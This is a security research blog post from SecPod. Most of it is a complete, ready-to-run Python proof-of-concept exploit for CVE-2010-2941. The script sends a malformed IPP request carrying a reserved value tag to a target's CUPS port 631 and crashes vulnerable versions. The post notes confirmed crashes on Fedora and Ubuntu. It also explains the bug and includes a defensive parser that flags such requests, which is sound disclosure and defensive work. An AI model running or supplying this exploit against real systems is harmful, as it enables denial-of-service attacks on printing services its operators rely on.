Fellas,
SecPod Research Team member "Veerendra GG" has written a working POC that crashes the CUPS service. The POC is based on the information in the Red Hat Bugzilla entry for CVE-2010-2941: it sends a malformed IPP (Internet Printing Protocol) request over TCP. For more information on this vulnerability, you can refer here. You can manage these vulnerabilities with the help of a good vulnerability management tool. The inline comments in the Python script explain how the bug was reproduced to crash the service. A vulnerability management system can resolve these issues and keep your infrastructure safe. For brevity, the POC is posted below as well.
POC: Download here
Packet Capture: Download here
[code=python]#!/usr/bin/python
##############################################################################
# CVE: CVE-2010-2941
# Exploit: https://www.secpod.com/blog/?p=157
#          http://secpod.org/CVE-2010-2941-Cups-Dos-POC.zip
# Reference: https://bugzilla.redhat.com/show_bug.cgi?id=624438
# Author: Veerendra G.G from SecPod Technologies (www.secpod.com)
#
# Exploit CVE-2010-2941 will crash CUPS Service
# Tested against 1.4.1 and 1.4.4
##############################################################################
import sys, socket, errno


def sendPacket(HOST, PORT, data1, data2):
    '''
    Sends data to a particular host on a specified port
    with a given data
    '''
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((HOST, PORT))
    s.sendall(data1)   ## HTTP request header
    s.sendall(data2)   ## IPP request body
    data = s.recv(1024)
    s.close()
    return data


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print "\tUsage: python exploit.py target_ip"
        print "\tExample : python exploit.py 127.0.0.1"
        print "\tExiting..."
        sys.exit(0)

    HOST = sys.argv[1]   ## The host ip
    PORT = 631           ## Default cups port

    ## POST Request
    ## (Content-Length 289 is the exact size of the IPP body built below;
    ## the Host header and printer-uri still carry the original test address)
    data1 = 'POST /ipp/ HTTP/1.1\r\n' +\
            'Host: 10.10.10.251\r\n' +\
            'User-Agent: CUPS/1.3.4\r\n' +\
            'Content-Length: 289\r\n' +\
            'Content-Type: application/ipp\r\n' +\
            'Expect: 100-continue\r\n\r\n'

    ## IPP Request
    data2 = '\x01\x01'            ## Version 1.1
    data2 += '\x00\x0b'           ## Operation-id Get-Printer-Attributes
    data2 += '\x00\x00\x00\x01'   ## Request ID 1

    ## Operation Attributes
    ## Attribute charset: utf-8
    data2 += '\x01'               ## Operation-attributes group tag
    data2 += '\x47'               ## Tag: Character Set
    data2 += '\x00\x12'           ## Name Length: 18
    data2 += '\x61\x74\x74\x72\x69\x62\x75\x74\x65\x73\x2d\x63\x68\x61\x72' +\
             '\x73\x65\x74'       ## Name: attributes-charset
    data2 += '\x00\x05'           ## Value Length: 5
    data2 += '\x75\x74\x66\x2d\x38'   ## Value: utf-8

    ## Attributes Natural Language
    data2 += '\x48'               ## Tag: Natural Language
    data2 += '\x00\x1b'           ## Name Length: 27
    data2 += '\x61\x74\x74\x72\x69\x62\x75\x74\x65\x73\x2d\x6e\x61\x74\x75' +\
             '\x72\x61\x6c\x2d\x6c\x61\x6e\x67\x75\x61\x67\x65'
                                  ## Name: attributes-natural-language
    data2 += '\x00\x05'           ## Value Length: 5
    data2 += '\x65\x6e\x2d\x75\x73'   ## Value: en-us

    ## Printer URI:
    data2 += '\x45'               ## Tag: URI
    data2 += '\x00\x0b'           ## Name Length: 11
    data2 += '\x70\x72\x69\x6e\x74\x65\x72\x2d\x75\x72\x69'   ## Name: printer-uri
    data2 += '\x00\x1b'           ## Value Length: 27
    data2 += '\x69\x70\x70\x3a\x2f\x2f\x31\x30\x2e\x31\x30\x2e\x31\x30\x2e' +\
             '\x32\x35\x31\x3a\x36\x33\x31\x2f\x69\x70\x70\x2f'
                                  ## Value: ipp://10.10.10.251:631/ipp/

    ## In the IPP protocol, an attribute can have multiple values, and each
    ## value is typed. In the CUPS data model for this, all values for a given
    ## attribute must have the same (or a compatible) type. By giving the first
    ## value for an attribute a value tag of 56 (0x38), which does not
    ## correspond to any particular value type and so is 'unknown', but which
    ## also is accepted as 'compatible' with string types due to the value tag
    ## range check, CUPS does not reject the request.

    ## Request Attributes
    data2 += '\x38'               ## Tag: Reserved
    ## This field is causing the problem. Tag: \x38 = 56;
    ## tags \x38, \x39 and \x40 are all "Reserved",
    ## hence it crashes for all these values
    data2 += '\x00\x14'           ## Name Length: 20
    data2 += '\x72\x65\x71\x75\x65\x73\x74\x65\x64\x2d\x61\x74\x74\x72\x69' +\
             '\x62\x75\x74\x65\x73'   ## Name: requested-attributes
    data2 += '\x00\x10'           ## Value Length: 16
    data2 += '\x63\x6f\x70\x69\x65\x73\x2d\x73\x75\x70\x70\x6f\x72\x74\x65' +\
             '\x64'               ## Value: copies-supported

    ## Additional values of requested-attributes (zero-length name)
    data2 += '\x44'               ## Tag: Keyword
    data2 += '\x00\x00'           ## Name Length: 0
    data2 += '\x00\x19'           ## Value Length: 25
    data2 += '\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2d\x66\x6f\x72\x6d\x61\x74' +\
             '\x2d\x73\x75\x70\x70\x6f\x72\x74\x65\x64'
                                  ## Value: document-format-supported
    data2 += '\x44'               ## Tag: Keyword
    data2 += '\x00\x00'           ## Name Length: 0
    data2 += '\x00\x19'           ## Value Length: 25
    data2 += '\x70\x72\x69\x6e\x74\x65\x72\x2d\x69\x73\x2d\x61\x63\x63\x65' +\
             '\x70\x74\x69\x6e\x67\x2d\x6a\x6f\x62\x73'
                                  ## Value: printer-is-accepting-jobs
    data2 += '\x44'               ## Tag: Keyword
    data2 += '\x00\x00'           ## Name Length: 0
    data2 += '\x00\x0d'           ## Value Length: 13
    data2 += '\x70\x72\x69\x6e\x74\x65\x72\x2d\x73\x74\x61\x74\x65'
                                  ## Value: printer-state
    data2 += '\x44'               ## Tag: Keyword
    data2 += '\x00\x00'           ## Name Length: 0
    data2 += '\x00\x15'           ## Value Length: 21
    data2 += '\x70\x72\x69\x6e\x74\x65\x72\x2d\x73\x74\x61\x74\x65\x2d\x6d' +\
             '\x65\x73\x73\x61\x67\x65'   ## Value: printer-state-message
    data2 += '\x44'               ## Tag: Keyword
    data2 += '\x00\x00'           ## Name Length: 0
    data2 += '\x00\x15'           ## Value Length: 21
    data2 += '\x70\x72\x69\x6e\x74\x65\x72\x2d\x73\x74\x61\x74\x65\x2d\x72' +\
             '\x65\x61\x73\x6f\x6e\x73'   ## Value: printer-state-reasons
    data2 += '\x03'               ## End of Attributes

    try:
        print "\tSending Crafted Packet to CUPS Service..."
        sendPacket(HOST, PORT, data1, data2)
        print "\tSent Crafted Packet Successfully..."
        print "\tCheck the CUPS Service, " +\
              "It will crash if it's a vulnerable version..."
    except Exception, msg:
        if getattr(msg, 'errno', None) == errno.ECONNREFUSED:
            print "\tUnable to Connect to CUPS Service..."
        else:
            print "Exception: ", msg[/code]
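As an added example, not part of the original post or SecPod's POC: a small defensive IPP attribute parser (Python 3) that applies the check described in the comments above strictly, flagging reserved value tags such as 0x38 and multi-valued attributes whose values do not share one tag, so a captured IPP body (for instance from the packet capture linked above) can be triaged offline. The sample request bytes and the printer host in them are constructed placeholders.

```python
import struct
# Value tags defined in RFC 2910 section 3.5.2; any other tag (incl. 0x38-0x40) is reserved.
KNOWN_VALUE_TAGS = {0x10, 0x12, 0x13, 0x21, 0x22, 0x23, 0x30, 0x31, 0x32, 0x33,
                    0x35, 0x36, 0x41, 0x42, 0x44, 0x45, 0x46, 0x47, 0x48, 0x49}

def parse_ipp(msg):
    """Parse an IPP body into [(group_tag, name, [value_tag, ...])]; ValueError if truncated."""
    try:
        pos, group, attrs = 8, None, []   # skip version (2), operation-id (2), request-id (4)
        while pos < len(msg):
            tag, pos = msg[pos], pos + 1
            if tag == 0x03:                   # end-of-attributes-tag
                return attrs
            if tag < 0x10:                    # delimiter tag: starts a new attribute group
                group = tag
                continue
            name_len, = struct.unpack_from(">H", msg, pos)
            name = msg[pos + 2:pos + 2 + name_len].decode("ascii", "replace")
            val_len, = struct.unpack_from(">H", msg, pos + 2 + name_len)
            pos += 4 + name_len + val_len     # skip the value itself; only its tag matters here
            if name:                          # a new attribute
                attrs.append((group, name, [tag]))
            elif attrs:                       # empty name: additional value of the previous attribute
                attrs[-1][2].append(tag)
            else:
                raise ValueError("additional value before any attribute")
    except struct.error:
        pass
    raise ValueError("truncated message or missing end-of-attributes tag")

def find_bad_attributes(msg):
    """Findings a strict receiver raises: reserved value tags, and mixed tags within one attribute."""
    findings = []
    for _group, name, tags in parse_ipp(msg):
        findings += ["%s: reserved value tag 0x%02x" % (name, t)
                     for t in tags if t not in KNOWN_VALUE_TAGS]
        if len(set(tags)) > 1:
            findings.append("%s: mixed value tags %s" % (name, [hex(t) for t in tags]))
    return findings

def attr(tag, name, value):   # one attribute value (RFC 2910 section 3.1.4); empty name = extra value
    return bytes([tag]) + struct.pack(">H", len(name)) + name + struct.pack(">H", len(value)) + value

# Constructed sample (placeholder host): IPP/1.1 Get-Printer-Attributes, request-id 1, op-attrs group.
HEADER = b"\x01\x01\x00\x0b\x00\x00\x00\x01\x01"
COMMON = (attr(0x47, b"attributes-charset", b"utf-8") + attr(0x48, b"attributes-natural-language", b"en-us")
          + attr(0x45, b"printer-uri", b"ipp://printer.example:631/ipp/"))
TAIL = attr(0x44, b"", b"printer-state") + b"\x03"
GOOD = HEADER + COMMON + attr(0x44, b"requested-attributes", b"copies-supported") + TAIL
BAD = HEADER + COMMON + attr(0x38, b"requested-attributes", b"copies-supported") + TAIL
```

`find_bad_attributes(GOOD)` returns no findings, while `find_bad_attributes(BAD)` reports both the reserved 0x38 tag and the mixed 0x38/0x44 tags on requested-attributes.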
Please let us know if you have any feedback or suggestions. 🙂
Cheers!
SecPod Research Team
www.secpod.com
We have tested the above exploit successfully on Fedora with CUPS versions 1.4.1 and 1.4.4.
And we have not tested it on Debian or any Debian-based distro.
The exploit is also working successfully on Ubuntu 10.10 with CUPS version 1.4.4-6ubuntu2.
See the Ubuntu security advisory for more info: http://www.ubuntu.com/usn/usn-1012-1